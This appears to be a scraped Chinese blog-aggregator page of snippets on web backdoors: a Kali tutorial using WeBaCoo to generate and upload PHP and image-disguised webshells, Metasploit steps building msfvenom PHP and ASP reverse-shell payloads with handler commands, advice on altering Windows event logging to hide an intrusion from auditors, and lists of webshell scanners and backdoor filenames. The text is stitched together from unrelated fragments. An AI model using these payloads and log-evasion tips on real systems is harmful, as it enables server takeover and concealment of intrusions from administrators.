精华内容
下载资源
问答
  • Web后门一键扫描WebShellKiller
  • 应急响应中web后门排查与高效分析web日志技巧WEB安全电脑资料 举例事件场景 XX公司网站首页被做了搜索引擎劫持跳转到 网站XX公司技术负责人早上9点10分发现情况联系到我们公司希望给他们做一次远程应急需求是[清除...
  • Web后门工具WeBaCoo

    2017-09-11 14:44:11
    Web后门工具WeBaCoo
    Web后门工具WeBaCoo

    WeBaCoo是使用Perl语言编写的Web后门工具。渗透测试人员首先使用该工具生成一个后门PHP页面。然后,将该页面上传到目标服务器上。最后,在本地终端直接访问该页面,WeBaCoo将执行的命令Base64编码后,借助Cookie的方式提交给服务器。后门页面通过解析Cookie,然后调用PHP系统函数进行执行,如system()、shell_exec()、exec()等。由于该页面不能设置密码,所以不适合长期的权限维持。
    展开全文
  • ASP.NET Web后门_dotnet整站程序
  • Kali Linux Web后门工具 Kali的web后门工具一共有四款,今天只介绍WebaCoo 首先介绍第一个WeBaCoo(Web Backdoor Cookie) WeBaCoo是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可在客户端和Web服务器之间...

     

    Kali Linux Web后门工具

    Kali的web后门工具一共有四款,今天只介绍WebaCoo

    首先介绍第一个WeBaCoo(Web Backdoor Cookie)

    WeBaCoo是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可在客户端和Web服务器之间实现执行代码的网页终端。WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这就意味着多数的杀毒软件、网络入侵检测/防御系统、网络防火墙和应用程序防火墙都无法检测到后门的存在。

    1、WeBaCoo有两种操作模式。

    ● Generation(生产线模式):指定-g 选项可进入这种模式。用户可在这种模式下制作PHP 代码的payload。

    ● Terminal(终端模式):指定-t选项可进入这种模式。用户可在这种模式下连接到被测主机的后门程序。

    2、在WeBaCoo 的HTTP Cookie 中,以下三个参数的作用最为重要。

    ● cm:以Base64 编码的shell指令。

    ● cn:加载着编码后输出内容的Cookie名称。

    ● cp:封装编码后输出内容的分隔符。

    打开之后的样子是这样的

     

    接下来使用命令 webacoo -g -o 1.php生成一句话木马

     

    可以看到1.php已经生成了,非常方便快捷。生成的文件存放在root目录下,下图可以看到内容使用编码形式,隐蔽性比较强

    将一句话木马上传至DVWA文件上传模块,实验一下

    可以看到已经成功上传至服务器,打开中国菜刀进行连接,不用输口令直接添加就可以

    getshell,拿到服务器

    然后我想到尝试做一下.jpg后缀的图片木马,进入kali,使用webacoo输入命令webacoo -g -o 1.jpg

     

    可以看到图片木马已经创建完成了,DVWA实验一下能不能成功

    上传至服务器,使用菜刀进行连接,成功连接

     

    Windows操作系统痕迹清除

    当攻击者进入目标系统后,不管做什么操作,操作系统或者网络服务程序分别会在日志中记录下相应事件。如果审计人员每天都查看日志,那么他们很容易就可以发现系统被攻击或者入侵。所以攻击者必须清楚的了解他们每个动作会在系统中留下什么样子的记录,以及使用很么工具可以将记录从日志中清楚,还不会被审计人员察觉。今天介绍的是windows操作系统的痕迹清除。

    首先在输入Win+R,在输入eventvwr.msc运行,打开事件查看器

    命令行工具为“wevtutil”,在cmd命令行输入wevtutil el,查看所有错误日志

    攻击者通过修改日志可以达到隐藏自己的目的,但是攻击者无法清除某一条日志,要不就清除所有日志,要不就不清除;但是如过清除所有日志的话

    很容易就会被审计人员察觉到有人入侵 ,所以可以修改日志的设置禁止日志记录某些具体事件;或者设置日志的最大容量为1M,选择不覆盖之前的记录或者手动清除日志。间接实现清除痕迹的目的。

     

    转载于:https://www.cnblogs.com/hai-long/p/10697289.html

    展开全文
  • web后门top

    2019-09-29 19:19:54
    1)出现频率最高的DDoS后门文件名 abc.php, xl.php, Xml.php, dedetag.class.php, counti.php, plase.php, cba.php, os.php, practical.php, abbb.php 。 2)出现频率最高目录 /plus/, /templets/, ...

      看到了一个博客  觉得关键点很有用

    1)出现频率最高的DDoS后门文件名

    abc.php,

    xl.php,

    Xml.php,

    dedetag.class.php,

    counti.php,

    plase.php,

    cba.php,

    os.php,

    practical.php,

    abbb.php 。

    2)出现频率最高目录

    /plus/,

    /templets/,

    /include/,

    /data/,

    /api/,

    /cache/,

    /admin/,

    /UploadFiles/,

    / 。

    3)最常被攻击的端口

    80,53,21,22 

     

    http://my.oschina.net/bluefly/blog/331699

    转载于:https://www.cnblogs.com/sevck/p/5435161.html

    展开全文
  • 隐藏web后门的方法

    2013-08-18 18:20:41
    亲 还在为后门无法隐藏而烦恼吗 这里提供了两个后门隐藏的办法 解除您的后顾之忧
  • Metasploit(后渗透攻击:web后门

    千次阅读 2018-12-10 22:19:03
    web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过...

    web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。

    1.meterpreter后门

       在metasploit中,有一个名为php meterpreter的payload,利用这个模块可创建具有meterpreter功能的 php webshell 。在攻击中使用metasploit php shell 的步骤如下所示:

    • 使用msfvenom创建一个webshell.php
    • 上传webshell.php到目标服务器
    • 运行metasploit multi-handler开始监听
    • 访问webshell.php页面
    • 获得反弹的metasploit shell 

    以下是通过webshell拿网站的大致流程:


    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.1 lport=4444 -f raw >1.
    php (通过msfvenom工具制作php meterpreter)
    
    然后将1.php上传到目标服务器上,接着启动msfconsole,使用以下命令设置监听。
    
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.1.100   (自己的攻击机IP地址)
    run    (运行)
    
    接着在网站上访问那个1.php的文件,回到msf下面,可以看见服务端已经反弹成功了。
    
    最后使用sysinfo和getuid等meterpreter命令渗透目标主机。
    
    
    

    2.aspx meterpreter后门

    本节要介绍的是metasploit下名为shell_reverse_tcp的payload,利用这个模块可创建具有meterpreter功能的各版本shell code。

    在攻击中使用aspx meterpreter后门的步骤和metasploit php shell 的大概相同。首先使用下列代码调用该模块,并设置相关参数

    use windows/shell_reverse_tcp     (使用该payload)
    info  
    set lhost 192.168.1.100
    set lport 4444
    save   保存
    
    生成各版本shellcode的命令如下:
    generate -t asp        //生成asp版的shellcode
    generate -t aspx       //生成aspx版的shellcode
    
    

    在这里我们生成一个asp版的webshell。

    我们把内容保存为asp.asp,在上传到目标服务器。

    接着启动msfconsole,使用以下命令设置监听。


    use  exploit/multi/handler

    set   payload windows/meterpreter/reverse_tcp

    set  lhost 192.168.1.100

    set  lport 4444

    run


    接着在网站上访问那个asp.asp的文件,回到msf下面,可以看见服务端已经反弹成功了。

    展开全文
  • 这是一款全自动Web后门查杀工具,基于Python开发 某些较新的后门可能会查杀失败 规则列表来自seay博客 回到顶部 使用方法 1.按恶意代码查杀: python Scan_webshell.py 目录名 2.按修改时间查杀: python Scan_...
  • WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端。WeBaCoo有两种工作模式:Generation(生产线模式):指定-g选项可进入这种...
  • [应急响应中web后门排查与高效分析web日志技巧], 关于系统后门和一些其他的日志系统日志什么就留到以后再说吧,所以就不要喷我连系统后门都不查还说应急响应。  举例事件场景:  XX公司网站首页被做了搜索引擎...
  • 从网上下载web源码的时候有时会不小心下到带后门的程序,可以使用以下介绍的几款Webshell查杀工具来检测一下,软件查后门需多方对比,有能力请手动验证。 一、D盾_Web查杀 软件使用自行研发不分扩展名的代码分析...
  • 注:以下内容仅供学习使用,其他行为均与作者无关!...本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168...
  • phpstudy linux 面板针对服务器和网站做了全面的安全防护措施,尽可能的防范网站被入侵,留置后门风险,本篇文章着重介绍phpstudy linux 面板其中的一项安全功能 【网站防火墙】之【GET(args)参数检查】,将木马...
  • audit_phpconf

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 17,577
精华内容 7,030
关键字:

web后门